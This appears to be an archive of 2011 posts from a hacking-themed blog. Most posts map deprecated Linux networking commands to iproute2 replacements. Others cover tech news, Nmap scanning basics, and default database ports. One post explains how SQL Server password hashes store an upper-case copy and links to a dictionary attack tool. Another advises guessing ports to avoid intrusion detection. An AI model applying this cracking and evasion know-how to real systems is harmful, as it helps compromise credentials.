Hackplanet

Replacements for Linux Commands : Part 3

2011-12-31T20:08:00.000-08:00

Click Here to go to Previous part : Part 2

Route

Deprecated route commands	Replacement
route . Displays the host’s routing tables.	ip route
route -A [family] [add] or route –[family] [add] . Uses the specified address family with add or del. Valid families are inet (DARPA Internet), inet6 (IPv6), ax25 (AMPR AX.25), netrom (AMPR NET/ROM), ipx (Novell IPX), ddp (Appletalk DDP), and x25 (CCITT X.25).	ip -f [family] route . [family] can be inet (IP), inet6 (IPv6), or link. Additionally, -4 = -f inet and -6 = -f inet6.
route -C or –cache . Operates on the kernel’s routing cache instead of the forwarding information base (FIB) routing table.	Not apparent; ip route show cache dumps the routing cache.
route -e or -ee . Uses the netstat-r format to display the routing table. -ee will generate a very long line with all parameters from the routing table.	ip route show
route -F or –fib . Operates on the kernel’s Forwarding Information Base (FIB) routing table (default behavior).	Not apparent
route -h or –help . Prints the help message.	ip route help
route -n . Shows numerical IP addresses and bypass host name resolution.	Not apparent
route -v or –verbose . Enables verbose command output.	ip -s route
route -V or –version . Dispays the version of net-tools and the route command.	ip -V
route add or del . Adds or delete a route in the routing table.	ip route [add \| chg \| repl \| del] [ip_addr] via [ip_addr]
route [add or del] dev [interface] . Associates a route with a specific device. If dev [interface] is the last option on the command line, the word dev may be omitted.	ip route [add \| chg \| repl \| del] dev [interface]
route [add or del] [default] gw [gw] . Routes packets through the specified gateway IP address.	ip route add default via [gw]
route [add or del] -host . Specifies that the target is a host (not a network).	Not apparent
route [add or del] -irtt [I] . Sets the initial round trip time (IRTT) for TCP connections over this route to [I] milliseconds (1-12000). This is typically only used on AX.25 networks. If omitted the RFC 1122 default of 300ms is used.	Not apparent; ip route [add \| chg \| repl \| del] rtt [number] sets the RTT estimate; rttvar [number] sets the initial RTT variance estimate.
route [add or del] -net . Specifies that the target is a network (not a host).	Not apparent
route [add or del] [-host or -net] netmask [mask] . Sets the subnet [mask].	Not apparent
route [add or del] metric [n] . Sets the metric field in the routing table (used by routing daemons) to the value of [n].	ip route [add \| chg \| repl \| del] metric [number] or preference [number]
route [add or del] mod, dyn, or reinstate . Install a dynamic or modified route. These flags are for diagnostic purposes, and are generally only set by routing daemons.	Not apparent
route [add or del] mss [bytes] . Sets the TCP Maximum Segment Size (MSS) for connections over this route to the number of [bytes] specified.	ip route [add \| chg \| repl \| del] advmss [number] (the MSS to advertise to these destinations when establishing TCP connections).
route [add or del] reject . Installs a blocking route, which will force a route lookup to fail. This is used to mask out networks before using the default route. This is not intended to provide firewall functionality.	ip route add prohibit [network_addr]
route [add or del] window [W] . Set the TCP window size for connections over this route to the value of [W] bytes. This is typically only used on AX.25 networks and with drivers unable to handle back-to-back frames.	ip route [add \| chg \| repl \| del] window [W]

.
Some examples of ip route command syntax are as follows.
# ip route add 10.23.30.0/24 via 192.168.8.50
# ip route del 10.28.0.0/16 via 192.168.10.50 dev eth0
# ip route chg default via 192.168.25.110 dev eth1
# ip route get [ip_address] (shows the interface and gateway that would be used to reach a remote host. This command would be especially useful for troubleshooting routing issues on hosts with large routing tables and/or with multiple network interfaces).

So here i guess the articles was understanble to you. Sorry for the formatting mistakes, Have fun.

Replacements for Linux Commands : Part 2

2011-12-31T19:59:00.000-08:00

So moving further with our FIRST PART , lets move onwards.

Iwconfig

Deprecated iwconfig commands	Replacement
iwconfig . Displays basic details about wireless interfaces, such as supported protocols (802.11a/b/g/n), Extended Service Set ID (ESSID), mode, and access point. To view these details about a particular interface, use iwconfig [interface] where the interface is the device name, such as wlan0.	iw dev [interface] link
iwconfig [interface] ap [address] . Forces the wireless adapter to register with the access point given by the [address], if possible. This address is the cell identity of the access point (as reported by wireless scanning) which may be different from its MAC address.	Not apparent
iwconfig commit . Some wireless adapters may not apply changes immediately (they may wait to aggregate the changes, or apply them only when the card is brought up via ifconfig). This command (when available) forces the adapter to immediately apply all pending changes.	Not apparent
iwconfig [interface] essid [name] . Connects to the WLAN with the ESSID [name] provided. With some wireless adapters, you can disable the ESSID checking (ESSID promiscuous) with off or any (and on to re-enable it).	iw [interface] connect [name]
iwconfig [interface] frag [num] . Sets the maximum fragment size which is always lower than the maximum packet size. This parameter may also control Frame Bursting available on some wireless adapters (the ability to send multiple IP packets together). This mechanism would be enabled if the fragment size is larger than the maximum packet size. Other valid frag parameters to auto, on, and off.	Not apparent
iwconfig [interface] [freq \| channel] . Sets the operating frequency or channel on the wireless device. A value below 1000 indicates a channel number, a value greater than 1000 is a frequency in Hz. You can append the suffix k, M or G to the value (for example, “2.46G” for 2.46 GHz frequency). You may also use off or auto to let the adapter pick up the best channel (when supported).	iw dev [interface] set freq [freq] [HT20\|HT40+\|HT40-] . iw dev [interface] set channel [chan] [HT20\|HT40+\|HT40-]
iwconfig [interface] key [key] [mode] [on \| off] . To set the current encryption [key], just enter the key in hex digits as XXXX-XXXX-XXXX-XXXX or XXXXXXXX. You can also enter the key as an ASCII string by using the s: prefix. On and off re=enable and disable encryption. The security mode may be open or restricted, and its meaning depends on the card used. With most cards, in open mode no authentication is used and the card may also accept non-encrypted sessions, whereas in restricted mode only encrypted sessions are accepted and the card will use authentication if available.	iw [interface] connect [name] keys [key] (for WEP) . To connect to an AP with WPA or WPA2 encryption, you must use wpa_supplicant.
iwconfig [interface] mode [mode] . Sets the operating mode of the wireless device. The [mode] can be Ad-Hoc, Auto, Managed, Master, Monitor, Repeater, or Secondary. . Ad-Hoc: the network is composed of only one cell and without an access point. Managed: the wireless node connects to a network composed of many access points, with roaming. Master: the wireless node is the synchronization master, or it acts as an access point. Monitor: the wireless node is not associated with any cell and passively monitors all packets on the frequency. Repeater: the wireless node forwards packets between other wireless nodes. Secondary: the wireless node acts as a backup master/repeater.	Not apparent
iwconfig [interface] modu [modulation] . Forces the wireless adapter to use a specific set of modulations. Modern adapters support various modulations, such as 802.11b or 802.11g. The list of available modulations depends on the adapter/driver and can be displayed using iwlist modulation. Some options are 11g, CCK OFDMa, and auto.	Not apparent
iwconfig [interface] nick [name] . Sets the nick name (or station name).	Not apparent
iwconfig [interface] nwid [name] . Sets the Network ID for the WLAN. This parameter is only used for pre-802.11 hardware as the 802.11 protocol uses the ESSID and access point address for this function. With some wireless adapters, you can disable the Network ID checking (NWID promiscuous) with off (and on to re-enable it).	Not apparent
iwconfig [interface] power [option] iwconfig [interface] power min \| max [secondsu \| secondsm] iwconfig [interface] power mode [mode] iwconfig [interface] power on \| off . Configures the power management scheme and mode. Valid [options] are: period [value] (sets the period between wake ups), timeout [value] (sets the timeout before going back to sleep), saving [value] (sets the generic level of power saving). The min and max modifiers are in seconds by default, but append the suffices m or u to specify values in milliseconds or microseconds. Valid [mode] options are: all (receive all packets), unicast (receive unicast packets only, discard multicast and broadcast) and multicast (receive multicast and broadcast only, discard unicast packets). On and off re-enable or disable power management.	Not apparent; some power commands are: . iw dev [interface] set power_save on . iw dev [interface] get power_save
iwconfig [interface] rate/bit [rate] . Sets the bit rate in bits per second for cards supporting multiple bit rates. The bit-rate is the speed at which bits are transmitted over the medium, the user speed of the link is lower due to medium sharing and various overhead.Suffixes k, M or G can be added to the numeric [rate] (decimal multiplier : 10^3, 10^6 and 10^9 b/s), or add ‘0‘ for enough. The [rate] can also be auto to select automatic bit-rate mode (fallback to lower rate on noisy channels), or fixed to revert back to fixed setting. If you specify a bit-rate numeric value and append auto, the driver will use all bit-rates lower and equal than this value.	iw [interface] set bitrates legacy-2.4 12 18 24
iwconfig [interface] retry [option] [value] . To set the maximum number of retries (MAC retransmissions), enter limit [value]. To set the maximum length of time the MAC should retry, enter lifetime [value]. By default, this value is in seconds; append the suffices m or u to specify values in milliseconds or microseconds. You can also add the short, long, min and max modifiers.	Not apparent
iwconfig [interface] rts [threshold] . Sets the size of the smallest packet for which the node sends RTS; a value equal to the maximum packet size disables the mechanism. You may also set the threshold parameter to auto, fixed or off.	Not apparent
iwconfig [interface] sens [threshold] . Sets the sensitivity threshold (defines how sensitive the wireless adapter is to poor operating conditions such as low signal, signal interference, etc). Modern adapter designs seem to control these thresholds automatically.	Not apparent
iwconfig [interface] txpower [value] . For adapters supporting multiple transmit powers, this sets the transmit power in dBm. If W is the power in Watt, the power in dBm is P = 30 + 10.log(W). If the [value] is postfixed by mW, it will be automatically converted to dBm. In addition, on and off enable and disable the radio, and auto and fixed enable and disable power control (if those features are available).	iw dev [interface] set txpower [auto \| fixed \| \|limit] [tx power in mBm] . iw phy [phyname] set txpower [auto \| fixed \| limit] [tx power in mBm]
iwconfig –help . Displays the iwconfig help message.	iw help
iwconfig –version . Displays the version of iwconfig installed.	iw –version

Some examples of the iw command syntax are as follows.
# iw dev wlan0 link
# iw wlan0 connect CoffeeShopWLAN
# iw wlan0 connect HomeWLAN keys 0:abcde d:1:0011223344 (for WEP)

Nameif

Deprecated nameif commands	Replacement
nameif [name] [mac_address] . If no name and MAC address are provided, it attempts to read addresses from /etc/mactab. Each line of mactab should contain an interface name and MAC address (or comments starting with #).	ip link set dev [interface] name [name] . ifrename -i [interface] -n [newname]
nameif -c [config_file] . Reads from [config_file] instead of /etc/mactab.	ifrename -c [config_file]
nameif -s . Error messages are sent to the syslog.	Not apparent

Netstat

Deprecated netstat commands	Replacement
netstat -a or –all . Shows both listening and non-listening sockets.	ss -a or –all
netstat -A [family] or –protocol=[family] . Specifies the address families for which connections are to be shown. [family] is a comma separated list of address family keywords like inet, unix, ipx, ax25, netrom, and ddp. This has the same effect as using the –inet, –unix (-x), –ipx, –ax25, –netrom, and –ddp options.	ss -f [family] or –family=[family] . Families: unix, inet, inet6, link, netlink.
netstat -c or –continuous . Configures netstat to refresh the displayed information every second until stopped.	Not apparent
netstat -C . Prints routing information from the route cache.	ip route list cache
netstat -e or –extend . Displays an increased level of detail. Can be entered as twice (as –ee) for maximum details.	ss -e or –extended
netstat -F . Prints routing information from the forward information database (FIB).	Not apparent
netstat -g or –groups . Displays multicast group membership information for IPv4 and IPv6.	ip maddr, ip maddr show [interface]
netstat -i or –interface=[name] . Displays a table of all network interfaces, or the specified [name].	ip -s link
netstat -l or –listening . Shows only listening sockets (which are omitted by netstat be default).	ss -l or –listening
netstat -M or –masquerade . Displays a list of masqueraded connections (connections being altered by Network Address Translation).	Not apparent
netstat -n or –numeric . Show numerical addresses instead of trying to determine symbolic host, port or user names (skips DNS translation).	ss -n or –numeric
netstat –numeric-hosts . Shows numerical host addresses but does not affect the resolution of port or user names.	Not apparent
netstat –numeric ports . Shows numerical port numbers but does not affect the resolution of host or user names.	Not apparent
netstat –numeric-users . Shows numerical user IDs but does not affect the resolution of host or port names.	Not apparent
netstat -N or –symbolic . Displays the symbolic host, port, or user names instead of numerical representations. Netstat does this by default.	ss -r or –resolve
netstat -o or –timers . Includes information related to networking timers.	ss -o or –options
netstat -p or –program . Shows the process ID (PID) and name of the program to which each socket belongs.	ss -p
netstat -r or –route . Shows the kernel routing tables.	ip route, ip route show all
netstat -s or –statistics . Displays summary statistics for each protocol.	ss -s
netstat -t or –tcp . Filters results to display TCP only.	ss -t or –tcp
netstat -T or –notrim . Stops trimming long addresses.	Not apparent
netstat -u or –udp . Filters results to display UDP only.	ss -u or –udp
netstat -v or –verbose . Produces verbose output.	Not apparent
netstat -w or –raw . Filter results to display raw sockets only.	ss-w or –raw
netstat -Z or –context . Prints the SELinux context if SELinux is enabled. On hosts running SELinux, all processes and files are labeled in a way that represents security-relevant information. This information is called the SELinux context.	Not apparent

Click here to go to Next part : Part 3

Replacements for Linux Commands : Part 1

2011-12-31T11:15:00.000-08:00

Okay so first of all, a very Happy New year to all the readers, followers, subscribers, and any one directly or indirectly related to the website. I had been writing this post from last two days, and got time to publish on this warm occasion of New Year. Neways, lets start up.

From so long we have been using many of the Linux commands, which can however can be replaced with some optional commands, which sounds damn easy and small as compared to old ones. Specifically, the commands which can be ignored while using Linux networking are: arp, ifconfig, iptunnel, iwconfig,nameif, netstat, and route. These programs (except iwconfig) are included in the net-tools package that has been unmaintained for years. The functionality provided by several of these utilities has been reproduced and improved in the new iproute2 suite, primarily by using its new ip command. The iproute2 software code and documentation are available from the Linux Foundation.

Now let’s take a closer look at these commands and their replacements.

This article will not focus on iproute2 or the ip command in detail; instead it will simply give one-to-one mappings between the deprecated commands and their new counterparts. For replacement commands that are listed as ‘not apparent’, please contact me if you know otherwise.

Deprecated command	Replacement command(s)
arp	ip n (ip neighbor)
ifconfig	ip a (ip addr), ip link, ip -s (ip -stats)
iptunnel	ip tunnel
iwconfig	iw
nameif	ip link, ifrename
netstat	ss, ip route (for netstat-r), ip -s link (for netstat -i), ip maddr (for netstat-g)
route	ip r (ip route)

.
Now let’s take a closer look at these deprecated commands and their replacements.

This article will not focus on iproute2 or the ip command in detail; instead it will simply give one-to-one mappings between the deprecated commands and their new counterparts. For replacement commands that are listed as ‘not apparent’, please contact me if you know otherwise.

Arp

Deprecated arp commands	Replacement
arp -a [host] or –all [host] . Shows the entries of the specified host name or IP address. If the [host] parameter is not used, all entries will be displayed.	ip n (or ip neighbor), or ip n show
arp -d [ip_addr] or –delete [ip_addr] . Removes the ARP cache entry for the specified host.	ip n del [ip_addr] (this “invalidates” neighbor entries) . ip n f [ip_addr] (or ip n flush [ip_addr])
arp -D or –use-device . Uses the hardware address associated with the specified interface.	Not apparent
arp -e . Shows the entries in default (Linux) style.	Not apparent
arp -f [filename] or –file [filename] . Similar to the -s option, only this time the address info is taken from the file that [filename] set up. If no [filename] is specified, /etc/ethers is used as default.	Not apparent
arp -H or –hw-type [type] or -t [type] . When setting or reading the ARP cache, this optional parameter tells arp which class of entries it should check for. The default value of this parameter is ether (i.e. hardware code 0×01 for IEEE 802.3 10Mbps Ethernet).	Not apparent
arp -i [int] or –device [int] . Selects an interface. When dumping the ARP cache only entries matching the specified interface will be printed. For example, arp -i eth0 -s 10.21.31.41 A321.ABCF.321A creates a static ARP entry associating IP address 10.21.31.41 with MAC address A321.ABCF.321A on eth0.	ip n [add \| chg \| del \| repl] dev [name]
arp -n or –numeric . Shows IP addresses instead of trying to determine domain names.	Not apparent
arp -s [ip_addr] [hw_addr] or –set [ip_addr] . Manually creates a static ARP address mapping entry for host [ip_addr] with the hardware address set to [hw_addr].	ip n add [ip_addr] lladdr [mac_address] dev [device] nud [nud_state] (see example below)
arp -v . Uses verbose mode to provide more details.	ip -s n (or ip -stats n)

.
Some ip neighbor examples are as follows:
# ip n del 10.1.2.3 dev eth0
Invalidates the ARP cache entry for host 10.1.2.3 on device eth0.
# ip neighbor show dev eth0
Shows the ARP cache for interface eth0.
# ip n add 10.1.2.3 lladdr 1:2:3:4:5:6 dev eth0 nud perm
Adds a “permanent” ARP cache entry for host 10.1.2.3 device eth0. The Neighbor Unreachability Detection (nud) state can be one of the following:

noarp – entry is valid. No attempts to validate this entry will be made but it can be removed when its lifetime expires.
permanent – entry is valid forever and can be only be removed administratively.
reachable – entry is valid until the reachability timeout expires.
stale – entry is valid but suspicious.

Ifconfig

Deprecated ifconfig commands	Replacement
ifconfig . Displays details on all network interfaces.	ip a (or ip addr)
ifconfig [interface] . The name of the interface. This is usually a driver name followed by a unit number; for example, eth0 for the first Ethernet interface. Eth0 will usually be a PC’s primary network interface card (NIC).	ip a show dev [interface]
ifconfig [address_family] . To enable the interpretation of differing naming schemes used by various protocols, [address_family] is used for decoding and displaying all protocol addresses. Currently supported address families include inet (TCP/IP, default), inet6 (IPv6), ax25 (AMPR Packet Radio), ddp (Appletalk Phase 2), ipx (Novell IPX) and netrom (AMPR Packet radio).	ip -f [family] a . [family] can be inet (IPv4), inet6 (IPv6), or link. Additionally, -4 = -f inet and -6 = -f inet6.
ifconfig [interface] add [address/prefixlength . Adds an IPv6 address to the [interface].	ip a add [ip_addr/mask] dev [interface]
ifconfig [interface] address [address] . Assigns the specified IP [address] to the specified [interface].	ip a add [ip_addr/mask] dev [interface]
ifconfig [interface] allmulti or -allmulti . Enables or disables all-multicast mode. If selected, all multicast packets on the network will be received by the [interface] specified. This enables or disables the sending of incoming frames to the kernel’s network layer.	ip mr iif [name] or ip mroute iif [name], where [name] is the interface on which multicast packets are received.
ifconfig [interface] arp or -arp . Enables or disables the use of the ARP protocol on this [interface].	ip link set arp on or arp off
ifconfig [interface] broadcast [address] . Specifies the address to use to use for broadcast transmissions. By default, the broadcast address for a subnet is the IP address with all ones in the host portion of the subnet address (i.e., a.b.c.255 for a /24 subnet).	ip a add broadcast [ip_address] . ip link set dev [interface] broadcast [mac_address] (sets the link layer broadcast address)
ifconfig [interface] del [address/prefixlength] . Removes an IPv6 address from the [interface], such as eth0.	ip a del [ipv6_addr or ipv4_addr] dev [interface]
ifconfig [interface] down . Disables the [interface], such as eth0.	ip link set dev [interface] down
ifconfig [interface] hw [class] [address] . Sets the hardware (MAC) address of this [interface], if the device driver supports this operation. The keyword must be followed by the name of the hardware [class] and the printable ASCII equivalent of the hardware address. Hardware classes currently supported include ether (Ethernet), ax25 (AMPR AX.25), ARCnet and netrom (AMPR NET/ROM).	ip link set dev [interface] address [mac_addr]
ifconfig [interface] io_addr [address] . Sets the start [address] in I/O space for this device.	Not apparent; possibly ethtool.
ifconfig [interface] irq [address] . Sets the interrupt line used by the network interface.	Not apparent; possibly ethtool.
ifconfig [interface] mem_start [address] . Sets the start address for shared memory of the interface.	Not apparent; possibly ethtool.
ifconfig [interface] media [type] . Sets physical port or medium type. Examples of [type] are 10baseT, 10base2, and AUI. A [type] value of auto will tell the interface driver to automatically determine the media type (driver support for this command varies).	Not apparent; possibly ethtool.
ifconfig [interface] mtu [n] . Sets the Maximum Transfer Unit (MTU) of an interface to [n].	ip link set dev [interface] mtu [n]
ifconfig [interface] multicast . Sets the multicast flag on the interface (should not normally be needed as the drivers set the flag correctly themselves).	ip link set dev [interface] multicast on or off
ifconfig [interface] netmask [mask_address] . Sets the subnet mask (not the IP address) for this [interface]. This value defaults to the standard Class A, B, or C subnet masks (based on the interface IP address) but can be changed with this command.	Not apparent
ifconfig [interface] pointopoint or -pointopoint . Enables or disables point-to-point mode on this [interface].	not apparent; possibly ipppd [device]. The command ip a add peer [address] specifies the address of the remote endpoint for point-to-point interfaces.
ifconfig [interface] promisc or -promisc . Enables or disables promiscuous mode on the [interface].	ip link set dev [interface] promisc on or off
ifconfig [interface] txquelen [n] . Sets the transmit queue length on the [interface]. Smaller values are recommended for connections with high latency (i.e., dial-up modems, ISDN, etc).	ip link set dev [interface] txqueuelen [n] or txqlen [n]
ifconfig [interface] tunnel [address] . Creates a Simple Internet Transition (IPv6-in-IPv4) device which tunnels to the IPv4 [address] provided.	ip tunnel mode sit (other possible modes are ipip and gre).
ifconfig [interface] up . Activates (enables) the [interface] specified.	ip link set [interface] up

.
Some examples illustrating the ip command are as follows; using the table above you should be able to figure out what they do.
# ip link show dev eth0
# ip a add 10.11.12.13/8 dev eth0
# ip link set dev eth0 up
# ip link set dev eth0 mtu 1500
# ip link set dev eth0 address 00:70:b7:d6:cd:ef

Iptunnel

Deprecated iptunnel commands	Replacement
iptunnel [add \| change \| del \| show]	ip tunnel a or add ip tunnel chg or change ip tunnel d or del ip tunnel ls or show
iptunnel add [name] [mode {ipip \| gre \| sit} ] remote [remote_addr] local [local_addr]	ip tunnel add [name] [mode {ipip \| gre \| sit \| isatap \| ip6in6 \| ipip6 \| any }] remote [remote_addr] local [local_addr]
iptunnel -V or –version	not apparent

.
The syntax between iptunnel and ip tunnel is very similar as these examples show.
# [iptunnel | ip tunnel] add ipip-tunl1 mode ipip remote 83.240.67.86 (ipip-tunl1 is the name of the tunnel, 83.240.67.86 is the IP address of the remote endpoint).
# [iptunnel | ip tunnel] add ipi-tunl2 mode ipip remote 104.137.4.160 local 104.137.4.150 ttl 1
# [iptunnel | ip tunnel] add gre-tunl1 mode gre remote 192.168.22.17 local 192.168.10.21 ttl 255

Click here for the Next Part : Part 2

9 Suggestions which Apple gave to Samsung

2011-12-08T09:30:00.001-08:00

Well, yeah i warmly accept that this time i am writing rubbish, but after looking at this, i cnt stop myself to blog it out.

Saturday, The Verge reported that Apple, in their usual arrogant way, felt they needed to tell Samsung how to design their devices. The list is quite humorous and completely outrageous.
Apple has told Samsung that, in order not to infringe on their design, Samsung should create a design with:

Display screens that aren't centered on the front face and have substantial lateral borders.
No front bezel at all.
Non-horizontal speaker slots.
Thick frames rather than a thin rim around the front surface.
Profiles that aren't thin.
Front surface that isn't black.
Overall shape that isn't rectangular, or doesn't have rounded corner.
Front surfaces with substantial adornment.
Cluttered appearance.

It must be however be noted that Apple's Ipad never followed a perfect tablet PC's design. In order to gain maximum profits, they made it all the simplest and ignored the actual path for making a Tablet.

Instead of improving their work, they are suggesting Samsung people. LOL. :D

BSNL's Website Hacked again

2011-12-06T03:26:00.001-08:00

In a shocking revelation, it has been claimed that the official website of Bharat Sanchar Nigam Limited (BSNL) has been hacked by some spurious group from Pakistan. This is yet another attempt from the Pakistan Cyber Army as a dummy test to ensure that the government organization has still loopholes existent and there is a need to ramp up the cyber security.

It has been confirmed that personal details of the subscribers, including names email addresses and phone numbers have been hacked by the group, however, any foul play so far has been denied by them. It came to notice at 2:21 am on December 4th, 2011, that such details have been hacked by the group. There are five members involved in the group namely -c0p, nginx-adm1n, enc0der, k3rnel and sm0ky, though the real identity has not been revealed.

World's First Android 4.0 Launched from China Market : Ice Cream Sandwich Tablet

2011-12-06T03:20:00.001-08:00

There is no shortage of cheap Android tablets from Chinese manufacturers that can be found for under $200 online, most of which are running an older version of Android and don’t have Google’s blessing (meaning no Google services and Market). MIPS Technologies and Ingenic Semiconductor announced today availability of the world’s first Ice Cream Sandwich, Android 4.0-powered tablet, and it just so happens to a $99 budget-friendly tab with decent specs.

The tablet will pack in a 1GHz MIPS-based ‘XBurst” CPU, 7-inch capacitive touchscreen, microSD, HDMI 1.3, WiFi 802.11 b/g/n, USB 2.0, 2-megapixel main cam, front-facing cam, and bluetooth. Ainovo, the company offering up the tablet to the Chinese market, is promising 30 hours standby and 8 hours video playback for battery.

The Novo7 will become available to the US market (likely with different branding) through other companies including OMG Electronics Ltd. and Leader International Inc. at a later date. There will also be 8 and 9-inch variants released in the future, mostly likely depending on the success of the 7-inch model. You might have to pay a little more than the US $99 price tag to get it shipped from a Chinese supplier before it lands stateside, but it will probably be your first chance to get your hands on an ICS tablet if you do.

Google Graph Calculator : Use Google as a Graphics Calculator

2011-12-05T23:49:00.001-08:00

Having learned a lot about Google's power with Google dorks, this time we came up with something cool which Google again offers and can be damn useful, specially to those who work on graphs etc a a lot. This is one of the latest Google's feature.

Yeah, u guessed it right. Its just about a simple query which you can hit to get a graphical output and that too mathematically.

So here we go.

The first demo case i am writing for Engineers [ as i studied with them and then eventually got my stream apart from those]. Lets write a simple Sin(x) function.

Simple Functions

x/2, (x/3)^2

Trignometric Functions

sin(x)+1/2 sin(2x)+2/3 sin(3x)

Sin(x), Cos(x), Tan(x)

Exponential Function

(exp(x)-exp(-x))/2

There are many other operations which can give you some appropriate output as per your requirement.

And the best part lies in the fact that "You can zoom in and out and pan across the plane to explore the function in more detail. You can also draw multiple functions by separating them with commas, "This feature covers an extensive range of single variable functions including trigonometric, exponential, logarithmic and their compositions, and is available in modern browsers".

You can also use Google Chart API Calculator developed by Jon Winstanley. Here is the link : http://www.jonwinstanley.com/charts/

How to crack SQL Server's password Hashes

2011-12-05T09:16:00.001-08:00

SQL Server uses an undeclared and undocumented function, pwdencrypt() to produce a hash of the user's password, which is stored in the sysxlogins table of the master database. I guess this is a common known thing which most of the people related to SQL knows. But i never met any article detailing this function. So here i am focusing on the details of this password hash so as to further get deeper with it.

So lets begin with how it looks like.

Using Query Analyzer, or the SQL tool of your choice, run the following query :

select password from master.dbo.sysxlogins where name='sa'

You should get something that looks similar to the following returned.

0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA

5449E6F649BA954AFF4057056D9B

This is the hash of the 'sa' login's password on my machine.

Now there is a uniqueness in this password hashing function. It would give you two different password hashes for the same password if you put some difference in their time. Design for this password hash function is made something like if two people use same password then their hashes will be different – thus would misinterpret you that password is the same.

Now lets run a case scenario and then lets study it. Here I am gonna take AAAAAA as the password ad then lets take a Hash on it using :

Select pwndecrypt(‘AAAAAA’)

Which produces hash

0x01008444930543174C59CC918D34B6A12C9CC9EF99C4769F819B43174C59CC918D34B6A

12C9CC9EF99C4769F819B

The key point here is there are two password hashes here and these has been concatenated for some advancd security measure. However luck lies in the fact that we ca crack them separately as well. This has actually do have 4 parts :

10x0100
284449305
343174C59CC918D34B6A12C9CC9EF99C4769F819B
43174C59CC918D34B6A12C9CC9EF99C4769F819B

As you can see 3^rd and 4^th parts are identical [same] which proves that the password is always stored twice. One of them is normal case sensitive password [which is originally provided] and the other one is upper case version of the same password. This is seriously concerning as anyone attempting to attack the hash had got his work reduced by Half. Moreover, he do not have to give any “case perms [Random caps lock sequences]” rather he can simply use Upper characters which will reduce the keyspace required for the same.

Here I am attaching the link for a simple command line dictionary attack tool.

Click here to get the code.

[ And this program is not coded by me, as my programming is a Null vector. :D ]

Nmap Kungfu Part 1 - Basic Scanning

2011-11-29T08:00:00.001-08:00

Nmap is by far the most popular port scanner available. You can download it from http://www.insecure.org/, and it compiles and installs in a breeze on most Windows and Unix operating systems including Mac OS X (via configure, make, make install). You can download Windows binaries (along with the required Winpcap) from http://www.insecure.org/.

One reason why nmap is so useful is that it offers many different scanning techniques from which you can choose. You can scan for hosts that are up, TCP ports, UDP ports, and even other IP protocols.

Before we get deep into this Nmap, lets take a look on the basics of Scanning [How scanning is actually done].

When a TCP connection is made to a port, the client sends a TCP packet with the SYN flag set to initiate the connection. If a server is listening on that port, it sends a packet with both the SYN and ACK flags set, acknowledging the client’s request to connect while asking to make a return connection. The client will then send a packet with the ACK flag set to acknowledge the server’s SYN. This is referred to as the TCP three-way handshake. When one side is done talking to the other, it will send a FIN packet. The other side will acknowledge that FIN and send a FIN of its own, waiting for the other side to acknowledge before the connection is truly closed. A RST packet can be sent by either side at any time to abort the connection. A sample TCP conversation between a client and server is shown here:

Three way handshake process

Client sends SYN to Server: “I want to connect.”
Server sends SYN/ACK to Client: “Okay; I need to connect to you.”
Client sends ACK to Server: “Okay.”
Client and Server send information back and forth, acknowledging each other’s transmissions with ACKs. If either side sends a RST, the connection aborts immediately.

Formal Shutdown Process
Client has finished the conversation; Client sends FIN to Server: “Goodbye.”
Server sends ACK to Client (acknowledging Client’s FIN). Server then sends a separate FIN to Client: “Okay. Goodbye.”
Client sends ACK to Server (acknowledging Server’s FIN): “Okay.”

Keep this information in mind while reading through the next few sections. It will help you to get a better grasp on how nmap and other port scanners get their information.

Scanning for Hosts

If you care only about determining which hosts on a network are up, you can use the Ping scanning method (-sP). It works similarly to fping in that it sends Internet Control Message Protocol (ICMP) echo requests to the specified range of IP addresses and awaits a response. However, many hosts these days block ICMP requests. In this case, nmap will attempt to make a TCP connection to port 80 (by default) on the host. If it receives anything (either a SYN/ACK or a RST), the host is up. If it receives nothing at all, the host is assumed to be down or not currently on the network. If you want only a list of hostnames for the IP range you’ve specified, try a list scan (-sL).

Flag	Description
SYN	Used to indicate the beginning of a TCP connection
ACK	Used to acknowledge receipt of a previous packet or transmission
FIN	Used to close a TCP connection
RST	Used to abort a TCP connection abruptly

The basic method of TCP port scanning is to do a TCP connect() (-sT) to a port to see whether anything responds. This is the same thing any TCP client would do to make a connection (complete the three-way handshake), except nmap will disconnect by sending a RST packet as soon as the handshake is complete. If you want to, you can use an version scan (-sV) to scan every open port for banner grabbing. Moreover you can use (-O) for detection of Operating system. Following are some examples of these types of scans:

Default Scan [ -sT]

Version Detection [banner grabbing] using -sV

Operating system Detection [using -O]

In case you forgets all these switches, don't panic. Just hitting "nmap" without any switch will pop your screen with complete list of these switches.

The following table indicates how the –sT, -sV, and –O scans operate:

Nmap Sends to Host Port	Nmap Receives from Host Port	Nmap Responds	Nmap Assumes
SYN	SYN/ACK	ACK followed by RST	Port is open; host is up.
SYN	RST	–	Port is closed; host is up.
SYN	–	–	Port is blocked by firewall or host is down.

This is great, but since you’re just making basic TCP connections, your connection most likely gets logged by the service that answers. Sometimes you want to be a bit quieter.

For getting more deeper with silent scans, wait for Nmap Kung Fu - Part 2.

Enjoy Hacking, Enjoy Hackplanet.

Video for this part is available at : http://videos.hackplanet.in/2011/11/nmap-kungfu-part-1-basic-scanning.html

Complete list of Web and Database Ports

2011-11-23T20:53:00.001-08:00

Most of the time, while working with hacks on web application bind up with some databases, a open port is a stucking point and forces us to carry out a port scan.

However port scan is undoubtedly best option, but what if some IDS has been implemented on the remote system? We are gonna put ourselves into monitoring even before starting the attack. So why do this shit?

Why not check the port numbers along with their server type and better give it a try on the basis of default ports as most of the Administrators uses the default ports only.

Here i am listing the ports used on all the popular Web and Database servers which you might need to refer while doing some audit.

Port	Server
66	Oracle SQL*Net
80	Hyper Text Transfer Protocol (HTTP)
81	HTTP Proxy, Alternative HTTP Port, Cobalt Server Administration Port
443	Secure Socket Layer (SSL)
445	Microsoft SQL Server over NetBIOS
457	UnixWare/Netscape FastTrack Server
1080	SOCKS Proxy
1100	Oracle WebCache Listener
1241	KaZaA File Sharing Server (HTTP-like protocol)
1352	Lotus Domino (Notes)
1433	Microsoft SQL Server 2000
1434	Microsoft SQL Server over TCP/IP Redirector
1521–1530	Oracle
1944	Microsoft SQL Server 7
2301	Compaq Insight Manager, Compaq Survey Utility
3128	HTTP Proxy (Squid, NetCache, etc.)
3306	mySQL
4000	Oracle WebCache Listener
4001	Oracle WebCache Listener
4002	Oracle WebCache Listener
4100	Sybase 11.0 (jConnect)
5000	Sybase 12.x
5432	PostgreSQL
5800	VNC HTTP Console Port #1
5801	VNC HTTP Console Port #2
5802	VNC HTTP Console Port #3
6346	Gnutella (HTTP-like protocol)
6347	Gnutella (HTTP-like protocol)
